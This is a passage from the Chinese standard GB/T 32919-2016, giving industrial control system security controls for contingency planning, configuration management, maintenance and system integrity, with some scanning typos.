应急计划并获得管理层批准。计划中应识别 ICS 业务应急需求、规定系统恢复优先 级与目标、明确责任人; b) 制定ICS 灾难恢复计划并获得管理层批准。灾难恢复计划应包含:启动灾难恢复计划的事 件;由自动运行变更手动运行规程;由远程控制变更为就地控制规程;响应者的角色和职责;备 份及存储的规程;逻辑网络图;授权对 ICS 进行物理和逻辑访问的人员清单;联系信息(包括 ICS 厂商、网络管理员、ICS 支持人员等);当前配置信息;部件更换要求; c) 把计划发布到【赋值:组织定义的、由名字和角色所标识的关键持续性人员和组织单位】; d) 按【赋值:组织定义的时间间隔】,组织评审计划。 补充指导: a) 在系统内部或与操作设备通信过程中发生处理失败时,应执行某些预置措施,如: 1) 向操作者发出失败警告,不采取措施; 2) 向操作者发出失败警告,并安全关闭处理进程; 3) 保留失败前最后的操作设置。 b) 组织应为各类系统或设施,定义连续性计划,在 ICS 内或运行设施的通信内丧失处理的事件 中,ICS 执行预先确定的规程(例如,警示设施的操作员,然后空运行;警示设施的操作员,然后 安全地停止工业过程;警示设施的操作员,然后在失效之前维护最后的运行设置)。 c) 考虑恢复系统状态变量,作为恢复的一部分(例如,在破坏之前,把机阀恢复到它们原始的设 置 ) 。 d) 相关安全控制:CP-6 、CP-7 、CP-8 、CP-9。 控制增强: a) 组织应协调应急计划与其他计划间的一致性; b) 组织应规划应急处理时的信息处理、通信和环境等支撑能力; c) 组织应维护应急计划,保障基本业务功能在规定的时间内保持正常运行; d) 组织应维护应急计划,保障全部业务功能在规定的时间内保持正常运行; e) 组织应维护硬件计划,保障基本业务功能不受影响或很少影响地异地运行; f) 组织应维护硬件计划,保障全部业务功能不受影响或很少影响地异地运行。 B.8.3 应急计划培训(CP-3) 控制: 组织应: a) 制定应急培训计划,并向具有相应角色和职责的工业控制系统用户提供应急培训; b) 按【赋值:组织定义的时间间隔】或在工业控制系统变更时,对相应人员进行应急培训。 补充指导: a) 相关安全控制:AT-2、A T-3 、CP-2。 控制增强: a) 模拟事件以配合应急培训,使得人员在危难时刻具备高效的应对能力。 b) 使用自动化机制提供更加全面、真实的培训环境。 B.8.4 应急计划测试和演练(CP-4) 控制: 组织应: a) 测试和演练工业控制系统的应急计划;有备用处理场所的应在备用处理场所进行测试和演练; 尽量采用自动机制进行。 b) 测试和演练时,应与负责相关计划的组织内各部门之间协调。 c) 测试和演练后,应将工业控制系统完整恢复和重建到已知状态。 d) 评审应急计划的测试结果;如有不合格项应启动纠正措施。 e) 按【赋值:组织定义的时间间隔】或应急计划变更时,进行【赋值:组织定义的测试和演练】。 补充指导: a) 以多种方式测试、演练应急计划并确定潜在的不足; b) 应急计划测试、演练的深度和精细度随着 ICS 影响等级的增加而提高; c) 应急计划测试、演练中应对按照计划所执行的紧急操作对系统运行、财产和人员的影响程度作 出判断; d) 由于对性能、安全(safety) 或可靠性具有重大影响而没有在ICS 上测试或演练该连续性计划 的情况下,组织应按裁减指导,使用合适的补偿控制(例如,使用安排的或非安排的系统维护活 动,包括对 ICS 部件和系统设施的响应,作为测试或演练连续性计划的机会)。 e) 相关安全控制:CP-2 、CP-3 、IR-3。 控制增强: a) 组织协调应急计划与其他相关计划相一致的测试和演练; b) 组织可在备用系统上测试、演练应急计划,并评估备用系统的应急处理能力; c) 组织应采用自动化机制,更彻底、有效地测试和演练应急计划; d) 组织应设计一套完整的工业控制系统的恢复和再构造,以便了解持续性计划测试部分的【选 择:安全(secure)/ 可靠(safe)】状态。 增强补充指导: 1) 重新设立该ICS, 涉及系统状态变量的恢复(例如,恢复阀门应具有合适的设置)。 B.8.5 备用存储设备(CP-5) 控制: 组织应: a) 建立备用存储设备,包括可存储和恢复 ICS 备份信息的必要协议; b) 确保备用存储设备的信息安全防护措施与主存储场所相同。 补充指导: a) 备份的频率和将备份数据传输至备用存储设备的速率要与恢复时间目标和恢复点目标相 一致。 控制增强: a) 备用存储设备与主存储设备实施物理隔离,以防止受到同样灾难的破坏; b) 对备用存储设备进行配置,保证其进行及时有效的恢复操作; c) 明确当发生区域性破坏或灾难时,备用存储设备潜在的问题,并明确补救措施。 B.8.6 备用处理设备(CP-6) 控制: 组织应: a) 建立备用处理设备,并规定ICS 迁移至备用处理设备并重启运行的时间要求; b) 确保迁移和恢复运行所需要的设备和供给在备用设备可用; c) 确保备用处理设备的信息安全防护措施与主处理设备相同。 补充指导: a) 在规定的时间内恢复操作所需的设备和供给在备用设备上可用,或者可以通过规定途径传输 到备用设备上; b) 恢复ICS 操作的时间表要与系统建立的恢复时间目标相一致。 控制增强: a) 备用处理设备应与主处理设备实施物理隔离,以防止受到同样灾难的破坏; b) 组织应明确灾难发生时的迁移行动,并保障灾难发生时备用处理设备可用; c) 组织应按业务可用性需求,开发备用设备的替代服务优先级; d) 组织应配置备用设备为就绪状态,准备支持基本的业务功能; GB/T 32919-2016 e) 组织应确认备用设备提供的安全功能与主设备一致。 B.8.7 通信服务(CP-7) 控制: a) 组织应建立备用通信服务,当主通信服务中断时,在【赋值:组织定义时间】内恢复组织基本业 务运行。 补充指导: 相关控制:CP-2、CP-3、CP-6。 控制增强: a) 组织应根据本组织的可用性要求,开发包含优先服务条款的主、备用电信服务协议; b) 组织在选择备用电信服务时,应考虑降低单点故障,尽可能选择不同的服务商; c) 组织应要求主、备电信服务商均提供应急响应计划。 B.8.8 系统备份(CP-8) 控制: 组织应: a) 制定ICS 备份策略,备份策略应当包括:备份方式、备份频率、备份内容、备份介质等; b) 按照已制定的备份策略对用户信息、系统信息及系统文档进行备份; c) 采取安全防护措施,保护备份信息的保密性、完整性和可用性。 补充指导: a) 备份的频率和将备份数据传输至备用存储设备的速率要与恢复时间目标和恢复点目标相 一致。 b) 完整性和可用性是系统备份信息主要关注的特性,保护备份信息以免非法泄露也非常重要。 应根据存储在备份介质上的信息的类型和重要程度,确定在完整性、可用性、机密性方面需要 采取的安全保护措施。 c) 系统关键数据如业务数据、设备配置数据、性能数据、告警数据等应有本地数据备份,按【赋值: 组织定义的周期】进行全备。 d) 相关安全控制:CP-2、CP-6、MP-4、SC-13。 控制增强: a) 采用合适的机制(如数字签名、加密散列)对ICS 备份信息进行完整性保护; b) 按预定的频率对备份信息进行测试以确保介质的可靠性和信息的完整性,保证备份信息的可 用性; c) 作为应急计划测试和演练的一部分,在恢复ICS 功能时有选择地使用备份信息; d) 将操作系统和其他重要 ICS 软件的备份副本存储在隔离设备上或者没有配置操作软件的存 储器中; e) 建立异地灾备中心,利用通信网络将信息实时备份到异地灾备中心; f) 建设备份系统,实现 ICS 数据的自动备份。 B.8.9 系统恢复与重建(CP-9) 控制: 组织应: a) 支持ICS 的恢复与重建,在破坏或故障后能够恢复到系统原有状态; b) 按【赋值:组织定义的、与恢复时间和恢复点的目标一致的时间间隔】,进行ICS 中用户层信息的恢复; c) 按【赋值:组织定义的、与恢复时间和恢复点的目标一致的时间间隔】,进行ICS 中系统层信息 的恢复。 补充指导: a) 安全地将ICS 恢复与重建到原有的状态意味着所有系统参数(包括默认值或自定义值)都将被 重新设置为安全值,补丁要重新安装,安全相关的配置要重新设置,应用软件和系统软件要重 装,加载最近一次安全备份上的信息,系统需要进行全面测试。 b) 在某些情况下,ICS 可能不合适或不适用该控制,组织应在安全计划中记录不采用该控制的原 因,必要时选取合适的补偿控制。 c) 重建 ICS, 涉及系统状态变量的恢复(例如,恢复阀门应具有合适的设置)。 d) 相关安全控制:CA-2、CA-6、CA-7、CP-2、CP-6。 控制增强: a) 应按【赋值:组织定义的时间间隔】,测试恢复信息,以验证可靠性和信息完整性; b) 组织提供一套补偿的安全控制,在【赋值:组织定义的时间间隔】内,将系统恢复到确定的 状态; c) 组织提供一套在【赋值:组织定义的时间间隔】内,将 ICS 组件恢复到安全和运行状态; d) 按【赋值:组织定义实时度】,配置实时或准实时的失败恢复能力; e) 组织应对备份/恢复所用的硬件、软件和固件实施保护。 B.9 配置管理(CM) B.9.1 配置管理策略和规程(CM-1) 控制: 组织应: a) 制定并发布正式的配置管理策略,其中应包含日的、范周、角色、责任、管理承诺、部门间的协调 以及合规性; b) 制定并发布正式的配置管理规程,以推动配置管理策略及与相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对配置管理方针策略及规程进行评审和更新。 补充指导: a) 通过该控制,为有效实现该族中的安全控制和控制增强,编制所需要的策略和规程; b) 该策略和规程应与相关法律、制度、政策、规章、标准和指南保持一致; c) 配置管理策略可作为组织信息安全策略的一部分; d) 配置管理规程可针对一般性的安全程序予以开发,当需要时,可针对特殊 ICS 予以开发; e) 在开发配置管理策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.9.2 基线配置(CM-2) 控制: 组织应: a) 制定并维护 ICS 当前的配置基线; b) 按【赋值:组织定义的时间间隔】或在系统发生重大变更后,对基线配置进行评审和更新; c) 保留旧版本 ICS 基线配置,以便必要时恢复配置。 补充指导: a) 组织应为ICS 及与ICS 通信和连接的部件,建立了一个基线配置; b) 该基线配置提供了有关ICS 的信息,如:为工作台、服务器、网络部件或移动设备所装载的标 准软件;提供了有关网络拓扑以及系统体系结构中的逻辑地点等信息; c) 该基线配置是对所构造 ICS 的最近的规格说明; d) 维护该基线配置,涉及当该ICS 改变时,及时创建新的基线; e) ICS 的基线配置与组织的业务体系结构是一致的; f) 相关安全控制:CM-3 、CM-6 、CM-8。 控制增强: a) 组织应按【赋值:组织定义的时间间隔】、【赋值:组织定义的情况】所要求,在系统部件整体安装 和升级等情况下评审并调整 ICS 的基线配置; b) 组织应使用白动化机制,及时维护 ICS 配置,确保保持完整、准确、就绪可用的基线; c) 组织应为开发和测试环境,维护一个基线配置; d) 组织应开发并维护已授权可在组织ICS 予以执行的【赋值:组织定义的软件程序列表】,使用 拒绝授权、除此之外的允许授权策略,标识在组织 ICS 上所有被允许执行的软件; e) 组织应开发并维护没有被授权可在组织ICS 上执行的【赋值:组织定义的软件程序列表】,使用 显式的拒绝授权策略,标识在组织 ICS 上所有被允许执行的软件; f) 组织应保留被认为可支持回滚的、老的基线配置版本。 B.9.3 配置变更(CM-3) 控制: 组织应; a) 批准对 ICS 的变更,并显式给出有关对安全影响的考虑; b) 建立得到批准的、对系统的受控配置变更; c) 保留并评审对系统的受控配置变更记录; d) 审计与受控配置变更相关联的活动; e) 通过【赋值:组织定义的配置变更控制元素】,按【赋值:组织定义的时间间隔】,召开会议,协调 配置变更控制活动。 补充指导: a) 组织应确定 ICS 配置变更类型; b) 配置变更涉及到系统性的建议、理由、实施、测试、评估、审查和配置; c) 更改配置包括组件改变、技术产品的配置修改、紧急修改和缺陷修复等; d) 变更审计是指变更前后实施变更所需的活动; e) 相关安全控制:CM-2 、CM-4 、CM-5 、CM-6。 控制增强: a) 组织应使用自动化机制,来建立对 ICS 所提议的变更之文档,通知指定的批准机构,强调【赋 值:组织定义的时间周期】没有接受到的批准,禁止变更,直到接受到指定的批准,建立对 ICS 完成变更的文档; 增强补充指导: 1) 在 ICS 不支持使用自动化机制来实现配置变更控制的情况下,组织应按裁剪指导,使用非 自动化的机制或规程作为一个补偿控制。 b) 在实现ICS 变更前,组织应测试、确认这些对 ICS 的变更,并建立相应的文档; c) 组织使用自动化机制,实现对当前ICS 基线的变更,并通过所安装的配置库,开发调整的基线; d) 组织要求信息安全代表,成为【赋值:组织定义的配置变更控制元素】的成员。 B.9.4 安全影响分析(CM-4) 控制: a) 组织包括【赋值:组织定义的人员列表以及信息安全代表】应在实施变更前,应对ICS 配置变更 进行分析,并判断该变更可能带来的潜在安全影响。 补充指导: a) 组织人员以及信息安全代表,如 ICS 安全官员; b) 为了分析对 ICS 的变更和相关的安全细节,安全影响分析的人员应具有合适的技能和专业 技术; c) 安全影响分析还可以包括风险评估,以便确定变更的影响,确定是否需要附加的安全控制; d) 安全影响分析是继续监视 ICS 中安全控制的一项重要活动; e) 组织应考虑ICS 的安全(safety) 和信息安全的相互依赖性; f) 相关安全控制:CA-2 、CA-7 、CM-3 、CM-9。 控制增强: a) 在新组件被安装到运行环境前,在不同的测试环境中进行测试、分析,寻找由于弱点、不足、不 相容或恶意所产生的安全影响; b) 在实施 ICS 变更后,应检测安全功能,以验证变更已被正确地实现,且满足相应系统的安全 需求。 B.9.5 变更的访问限制(CM-5) 控制: 组织应: a) 定义、记录、批准和实施与 ICS 变更相关的物理和逻辑访问限制。 b) 限制工业控制系统开发方和集成方对生产环境中的ICS 及其硬件、软件和固件的直接变更。 补充指导: a) 对系统硬件、软件和固件的任何变更,均可能潜在地对系统的整体安全产生重大影响; b) 只有以启动变更为目的的、被授权的个体才允许获得对ICS 组件的访问; c) 为确保变更的顺利实现,应保存并维护访问记录; d) 变更的访问限制还应包括软件库、物理和逻辑访问控制、自动化工作流、媒介库,抽象层等; e) 在其他控制中包含了对实现该安全控制所必要的机制和过程; f) 相关安全控制;AC-3、AC-6 、CM-3 、CM-6、PE-3。 控制增强: a) 组织应使用自动化机制执行访问限制,支持执行动作的审计; 增强补充指导: 1) 在ICS 不支持使用自动化机制来执行变更的访问限制的情况下,组织应按裁剪指导,使用 非自动化的机制或规程作为补偿控制。 b) 组织应按【赋值:组织定义的时间问隔】,进行ICS 变更的审计,分析未经授权的变更; c) ICS 应禁止安装没有得到组织认可和批准的软件程序; 增强补充指导: 1) 在 ICS 不支持预防没有通过组织认可和批准的证书而安装软件程序的情况下,组织应按 裁剪指导,使用可替代的机制或规程作为一个补偿控制(例如,审计软件安装)。 d) 对【赋值:组织定义的ICS 部件和系统层信息】的变动,执行双人规则; e) 组织应限制系统开发人员和集成人员,在生产环境中只有授权才能更改硬件、软件和固件以及 GB/T 32919—2016 系统配置信息;按【赋值:组织定义的时间周期】,评审并重新评估 ICS 开发人员/集成人员的 权利; f) 组织应保护软件库,以免引入未授权的代码或恶意代码; g) ICS 实现自动功能或机制,以发现不恰当的系统变更。 B.9.6 配置设置(CM-6) 控制: 组织应: a) 依据安全配置检查清单,实施工业控制系统中所使用产品的配置,并实现与运行需求一致的 模式; b) 基于 ICS 的运行需求,评估 ICS 组件与已设配置存在的偏差,并对其进行标识和记录; c) 根据相关策略和规程,监控配置设置项的变更; d) 使用自动机制,对配置设置进行集中管理、应用和验证。不支持自动化机制的 ICS, 采用其他 方式进行集中管理,应用,并验证配置设置; e) 将检测到的未授权的、与安全相关的配置变更纳入到事件响应中,以确保对被检测事件的追 踪、监视、纠正,并形成可用的历史记录。 补充指导: a) 配置设置是ICS 中与安全相关的可配置参数; b) 安全相关参数是那些可能影响 ICS 安全状态,或支撑其他安全控制需求的参数; c) 组织可从 ICS 中导出组织层面的强制性配置参数; d) 安全配置列表是一系列指令、过程或参数,用于配置ICS 以满足组织业务需求; e) 相关安全控制:CM-2 、CM-3。 控制增强: a) 组织应使用自动化机制,集中管理、应用并验证配置设置; 增强补充指导: 1) 在 ICS 不支持使用自动化机制来集中管理、应用和验证配置设置的情况下,组织应按裁剪 指导,使用非自动化的机制或规程作为补偿控制。 b) 组织应使用自动化机制,对未授权改变【赋值:组织定义的配置设置】做出响应; c) 组织应将发现的未授权、与安全有关的配置改变,结合到组织的安全事件响应能力,以确保每 一个所发现的事件予以跟踪、纠正; d) ICS 在引入到生产环境前,应证实其符合安全配置指南。 B.9.7 最小功能(CM-7) 控制: 组织应: a) 对 ICS 按照仅提供最小功能进行配置,并按照【赋值:组织定义的列表】,对非必要功能、端口、 协议和服务的使用进行禁止或限制; b) 按【赋值:组织定义的时间间隔】对ICS 进行评审,以标识和排除不必要的功能、端口、协议和 服务。 补充指导: a) ICS 往往提供额外的功能和服务; b) 默认提供的部分功能和服务可能不是组织需要的; c) 有时个别组件提供多个功能和服务,限制某个功能和服务可能会影响其他功能的正常运行,限 制某个功能时应仔细审查; d) 组织应禁止无用的、未使用的物理和逻辑端口和协议,以防止未授权的连接或访问; e) 组织可以利用网络扫描工具、IDS/IPS 、防火墙等系统或工具来识别和阻止禁用功能、端口、协 议和服务; f) 相关安全控制:AC-6 、CM-2 、RA-5。 控制增强: a) 为标识并消除不必要的功能、端口、协议和服务,应按【赋值:组织定义的时间间隔】对ICS 进行 风险评估; b) 组织应使用白动化机制,应对授权软件程序、未授权软件程序的执行; 增强补充指导: 1) 在 该ICS 不使用自动化机制来预防程序执行的情况下,组织按一般的裁剪指导,使用补 偿控制(例如,外部的自动化机制,规程)。 c) 组织应确保提供了满足组织需求的功能、端口、协议和服务。 B.9.8 系统组件清单(CM-8) 控制: 组织应开发并维护 ICS 组件清单,并建立相应的文档。该清单应: a) 准确地反映当前 ICS; b) 与 ICS 的授权边界是一致的; c) 其粒度应满足跟踪和报告需要; d) 包含【赋值:组织定义的、达到有效性的和可核查性信息】; e) 对指定的组织官员的评审和审计是可用的。 补充指导: a) 对达到有效特性的可核查性被认为是必要的信息,例如:硬件清单规格说明(制造方,类型,系 列号,物理位置),软件许可信息,ICS 和部件拥有者以及网络化部件或设备,机器名和网络 地址。 b) 相关安全控制:CM-2 、CM-6 、PM-5。 控制增强: a) 当新组件安装、组件拆除或 ICS 调整时,调整 ICS 组件清单; b) 组织应使用自动化机制,帮助及时、完整和准确地维护 ICS 组件清单; c) 组织应使用自动化机制,按【赋值:组织定义的时间间隔】,检测 ICS 增加的未授权组件或设备; d) 组织应通过名字、位置和角色等标识ICS 组件的可核查性; e) 组织应验证 ICS 物理边界内的所有组件或已被列入清单,作为系统的一部分,或被其他系统所 知道,作为那个系统中的一部分; f) 组织应关注在 ICS 组件清单中所有配置。 B.9.9 配置管理计划(CM-9) 控制: 组织应开发 ICS 的配置管理计划,建立相应的文档并实现该计划。该计划包括: a) 强调角色、责任和配置管理过程和规程; b) 应按【赋值:组织定义 ICS 配置项】,并在系统开发生存周期内,把这些配置项放人配置管 理中; c) 为标识和管理系统生存周期中的配置项,建立相应的手段。 GB/T 32919-2016 补充指导: a) 配置项是 ICS 中可被配置管理的项,包括硬件、软件、固件和文档; b) 配置管理计划应满足组织配置管理策略需要,可经裁剪用于特定的ICS; c) 配置管理计划定义了ICS 生命周期中配置管理的详细过程和程序; d) 配置管理审批过程包括指派对配置变更审批负责人、配置变更影响分析者和配置变更执行者; e) 相关安全控制:CM-2、CM-3、CM-4、CM-5、CM-8。 控制增强: a) 组织把开发配置管理过程的责任,赋予不直接参与系统开发的组织人员。 B.10 维护(MA) B.10.1 维护策略和规程(MA-1) 控制: 组织应; a) 制定并发布正式的 ICS 维护策略,其中应包含目的、范围、角色、责任、管理承诺、各部门间的协 调以及合规性; b) 制定并发布正式的 ICS 维护规程,以推动系统维护策略及相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对维护策略和规程进行评审和调整。 补充指导: a) 期望通过该控制,为有效实现该族中的安全控制和控制增强,编制所需要的策略和规程; b) 该策略和规程应与相关法律、法规、制度、政策、标准和指南保持一致; c) 维护策略可作为组织信息安全策略的一部分; d) 维护规程可针对一般性的安全程序予以开发,当需要时,可针对特殊 ICS 予以开发; e) 在开发配置管理策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.10.2 受控维护(MA-2) 控制: 组织应: a) 根据产品供应商的规格说明以及组织的要求,对ICS 系统组件的维护和修理进行规划、实施、 记录,并对维护和修理记录进行评审; b) 审批和监督所有的运维活动,无论是现场还是远程维护,无论设备是工作状态还是非工作 状态; c) 按照【赋值:组织定义的角色或人员要求】,明确批准对ICS 或组件等设施的异地维护或维修; d) 按照组织要求,删除异地维护或维修设施的存储资料; e) 检查确认所有的安全控制在 ICS 或组件维护维修期间能够正常工作; f) 产品供应方或维护方应承诺未经用户同意不得采集用户相关信息、不得远程控制用户产品; g) 如果采用远程维护的方式,组织应根据产品的运维需求,为远程控制端口设置控制权限和控 制时间窗; h) 按【赋值:组织定义的要求】登记记录维护维修。 补充指导: a) 创建有效的维护记录所必要的信息,包括:维护日期和时间、维护人员或组织信息、维护描述、 涉及的 ICS或组件的拆除或替换。 GB/T 32919—2016 b) 相关安全控制:CM-3、CM-4、MA-4、SI-2。 控制增强: a) 采用自动化的机制按【赋值:组织定义的时间间隔】来组织、规划、实施和记录维护或维修 b) 准确、完整地记录所有的维护或维修的行动计划、要求、过程和完成; c) 在远程维护完成后,组织应安排专人立即关闭为远程维护需求开放的权限设置。 B.10.3 维护工具(MA-3) 控制: a) 组织应批准、控制、监测ICS 维护工具及其使用。 补充指导: a) 维护工具通常包含硬件、软件形式的诊断测试设备或固件程序; b) 维护工具是恶意代码的潜在传播工具; c) 相关安全控制:MA-2、MA-5。 控制增强: a) 组织应检查、监督维护人员可能的对ICS 设备维护工具的不当使用或擅自修改; b) 组织应检查用于ICS 设备维护的工具、诊断测试程序是否包含恶意代码; c) 组织应防止含组织信息的ICS 设备或组件在维护或维修时的擅自拆除,确保替换下的设备或 组件包含的信息被消除,从 ICS 拆除设备或组件应获得【赋值:组织定义的个人或角色】的 授权; d) 维护工具应限制在授权人员内部使用; e) ICS 维护工具不能收集用户信息。 B.10.4 远程维护(MA-4) 控制: 组织应: a) 批准、监督 ICS的远程维护或诊断行为; b) 仅允许与组织安全策略和安全计划一致的远程维护诊断工具; c) 在建立远程维护诊断会话时应采用强认证方式; d) 维护远程维护诊断行为的记录; e) 远程维护诊断行为结束时应关闭会话和网络连接。 补充指导: a) 远程维护通常是通过外部网络或内部网络进行的维护诊断行为 b) 为远程维护诊断行为开放的会话,往往会影响安全设置; c) 相关安全控制:AC-2、AC-3、MA-2、MA-5、PL-2、SC-7。 控制增强: a) 组织应根据【赋值:组织定义的审计策略】对远程维护诊断行为进行审计,并审查远程维护诊断 期间所有的行为; b) 组织应在安全策略或安全计划等文件中规范远程维护诊断行为 c) 组织应仪在远程维护诊断期间开放ICS 或设备的远程维护服务功能;产品或系统供应商应在 交付时告知组织如何关闭/开放远程维护服务功能 增强补充指导: 1) 在危机或紧急情况下,组织可能需要即可访问非本地维护和诊断服务,以便恢复基本的 ICS 运行或服务 GB/T 32919—2016 2) 在组织不必访问所需安全层上非本地维护和诊断服务的情况下,组织应按裁剪指导,使用 合适的补偿控制(例如,把该维护和诊断服务的范围限制到最小的基本活动,认真监视并 审计非本地维护和诊断服务)。 d) 组织应采用【赋值:组织定义的强认证机制】保护远程维护会话,并将该类会话与系统其他会 话通过物理或逻辑的方式进行隔离; e) 组织应根据【赋值:组织定义的人员或角色】对每个远程维护会话进行授权和确认; f) 组织应采用一定的安全机制实现远程维护会话的机密性和完整性保护; g) 在远程维护会话终止时,ICS 应进行终止确认。 B.10.5 维护人员(MA-5) 控制: 组织应: a) 建立了维修人员授权过程,并维护授权人员或组织列表; b) 确信维护人员具有访问授权; c) 指派具有访问权限和技术能力的组织内部人员监督管理不具有访问权限的维护人员。 补充指导: a) 监督人员应具有访问所维护的 ICS 的权限; b) 监督人员应具有一定的专业技术能力,以保障对维护人员的监督需要; c) 以前没有授权的维修人员,如制造商、供应商、系统集成商、顾问,在进行维护诊断时,可能需要 访问ICS 的授权,基于组织的风险评估策略,可以发放临时授权凭据。 d) 相关安全控制:AC-2、IA-8、MP-2、PE-2。 控制增强: a) 对维护人员实施必要的管理,包括组织内部人员的全程陪同 b) 开发并实现必要的安全防护措施,确保对ICS 的维护不会对正常运行造成影响; c) 确保维护人员进行维护诊断活动对ICS 处理、存储和传输的信息不造成破坏性影响; d) 确保维护人员进行维护诊断活动不会对ICS 处理、存储和传输的机密信息造成泄露。 B.10.6 及时维护(MA-6) 控制: a) 组织应确保获得维护支持,并保障在【赋值:组织定义的ICS 组件失效时间】内获得配件支持。 补充指导: a) 组织评估确定那些在其不能正常工作会给组织业务、人员和财产等造成重大影响的ICS 组件; b) 组织行为的获得维护支持通常是指适当的合同保障; c) 相关安全控制:CM-8、CP-2。 控制增强: a) 组织应【赋值:按定义的时间间隔】对ICS 及组件进行预防性的维护诊断; b) 组织应启用一定的机制将预防性维护诊断数据导入管理系统。 B.11 系统与信息完整性(SI) B.11.1 系统与信息完整性策略和规程(SI-1) 控制: 组织应: GB/T 32919—2016 a) 制定并发布正式的系统与信息完整性策略,内容包括目的、范围、角色、责任、管理承诺、组织实 体之间的协调关系以及依从关系等; b) 制定并发布正式的系统与信息完整性规程,以推动该策略及相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对系统与信息完整性策略及规程进行评审和更新。 补充指导; a) 系统与信息完整性策略和章程应与相关法律、法规、规章、制度及标准相一致。 b) 系统与信息完整性策略可以包含在组织的通用信息安全策略中,需要时,可以为一般的安全 程序或特殊 ICS 制定系统与信息完整性策略和规程。 控制增强:无 B.11.2 缺陷修复(SI-2) 控制: 组织应: a) 对系统中存在的缺陷进行标识、报告并进行纠正; b) 在缺陷相关的软件和固件升级包在安装前,验证其有效性并评估可能带来的后果 c) 在软件和固件升级包发布后,在适当的时间进行升级并明确升级和维护频率; d) 将缺陷修复并入组织的配置管理过程之中。 补充指导: a) 识别软件缺陷对 ICS 的影响,及时安装最新发布的安全相关补丁和服务包。 b) 安装补丁应该格外小心, 一方面补丁可修补系统脆弱性,但同时也可能引入更大的风险;另一 方面,许多ICS 使用供应商已不再支持旧版本的操作系统,因此提供的修补程序可能不适用。 在更新补丁之前-·定要在测试系统中经过仔细的测试,明确可能导致的副作用,并制定详细的 回退计划。 c) 补丁机制通常都是自动的,在ICS 中,如有必要,应将补丁安装安排在停机的时候进行。 d) 相关安全控制:CA-2、CA·7、CM-3、CM-5、CM-8、MA-2、IR-4、RA-5、SA-10、SA·11、SI-11。 控制增强: a) 统一管理缺陷修补程序和自动化升级程序; 增强补充指导: 1) 在组织不集中管理弱点修补和自动化更新的情况下,组织按一般的裁剪指导,使用非自动 化机制或规程作为补偿控制。 b) 根据【赋值:组织定义的频度】采用自动化机制,根据ICS 及组件的状态实施缺陷修复 增强补充指导: 1) 在 ICS 不支持使用自动化机制进行并报告有关弱点修补状态的情况下,组织应按裁剪指 导,使用非自动化机制或规程作为补偿控制。 c) 根据【赋值:组织定义的基准】来度量缺陷识别与缺陷修复间的关系; d) 组织采用自动化的补丁管理工具,以方便缺陷修复。 B.11.3 恶意代码防护(SI-3) 控制: 组织应; a) 在 ICS 网络中建立恶意代码防护机制,以检测和清除恶意代码 b) 按照【赋值:组织定义的管理政策和程序】,更新恶意代码防护机制; c) 按照【赋值:组织定义的安全策略】,按【赋值:组织定义的时间间隔】扫描和实时检测恶意代码; GB/T 32919—2016 d) 关注恶意检测和清除过程中的误操作,以及可能对ICS 运行造成的影响。 补充指导: a) 恶意代码防护软件版本和恶意代码库要及时更新; b) 恶意代码防护软件和恶意代码库在安装前应经过测试; c) 恶意代码通常由以下几种方式传播:通过电子邮件、电子邮件附件、网络访问、可移动介质,或 者通过利用系统的脆弱性; d) 在恶意代码检测和清除过程中,对系统的可用性可能会产生潜在的影响,应考虑接受误诊 误测; e) 相关安全控制:CM-3、MP-2、SA-4、SA-8、SA-12、SA-13、SC-7、SC-26、SC-44、SI-2、SI-4、SI-7。 控制增强: a) 集中管理恶意代码防护机制; 增强补充指导: 1) 在认真考虑并验证恶意代码防范机制对ICS 运行性能没有负面影响后,才确定使用。 b) 自动升级恶意代码防护机制; 增强补充指导: 1) 在该 ICS 不支持使用自动化机制来更新恶意代码防范机制的情况下,组织应按裁剪指 导,使用非自动化机制或规程作为补偿控制。 c) 防止非特权用户绕过恶意代码保护功能; d) 组织应限制便携式设备在 ICS 中的使用; e) 组织应根据【赋值:组织定义的周期】检测恶意代码防护机制的有效性。 B.11.4 系统监控(SI-4) 控制: 组织应: a) 监控 ICS 运行,及时发现可能受到的攻击; b) 标识对 ICS 的非授权访问; c) 部署监控设备,收集【赋值:组织定义的必要信息】,跟踪组织感兴趣的行为; d) 根据风险提示,方便提高监控级别; e) 根据法律、法规和政策要求调整系统监控。 补充指导; a) 系统监控包括外部和内部监控,外部监控是指对系统边界发生事件的监控,内部监控是指对系 统内部发生事件的监控; b) 系统监测能力是通过各种工具和系统来实现,包括 IDS/IPS、恶意代码监控软件、审计软件和 网络监控软件等; c) 监控工具和系统通常部署在系统边界或靠近核心系统; d) 监控系统收集信息的粒度由组织监控目标和系统能力来决定的; e) 组织应确保使用不对ICS 运行产生负面影响的监视工具和技术; f) 相关安全控制:AC-3、AC-4、AC-8、AC-17、AU-2、AU-6、AU-7、AU-9、AU-12、CA-7、IR-4、PE- 3、RA-5、SC-7。 控制增强; a) 组织应将独立的入侵检测工具通过通用协议整合到组织层面的 IDS 中 ; b) 组织应采用自动化工具来支持事件的实时分析; 增强补充指导: GB/T 32919—2016 1) 在ICS 不支持使用自动化机制来支持实时事件分析的情况下,组织应按裁剪指导,使用 非自动化机制或规程作为补偿控制。 c) 组织应将入侵检测工具与访问控制、流量控制等机制整合,以快速晌应攻击; d) 系统应监控进出的非正常和未授权通信; e) 系统应根据【赋值:组织定义的显式或潜在的威胁】进行实时报警; f) 系统应具有防止非授权用户绕开人侵检测/防御系统的能力; 增强补充指导: 1) 在 ICS 不具备非特权用户规避入侵检测和预防能力的情况下,组织应按裁剪指导,使用合 适的补偿控制(例如,强审计)。 g) 当【赋值:组织定义的可疑事件】发生时,系统应能够实时通知设置的干系人; h) 组织应保护对入侵监测工具所获得的信息的未授权访问、修改和删除; i) 组织应根据定义的周期测试和演练入侵检测工具和系统; j) 组织应规定:加密流量是系统监控工具可见的; k) 组织应分析边界通信流量,必要时,分析内部特定点的通信流量,以发现可能存在的异常 1) 组织应采用自动化机制,在发生定义的不正常的活动与安全影响时,提醒安全人员; m) 组织应分析通信流量与事件间的关系,并根据分析结果调整监控设备,以降低误报和漏报率, n) 组织应采用无线入侵检测系统,以识别流氓的无线设备,并检测无线通信流量、无线攻击尝试 和潜在违反组织无线使用策略的行为。 B.11.5 安全报警(SI-5) 控制: 组织应: a) 接收外部组织持续的信息安全报警、警告和安全指令; b) 必要时发布内部信息安全报警、警告和安全指令; c) 向【赋值:组织定义的干系人】推送信息安全报警、警告和安全指令; d) 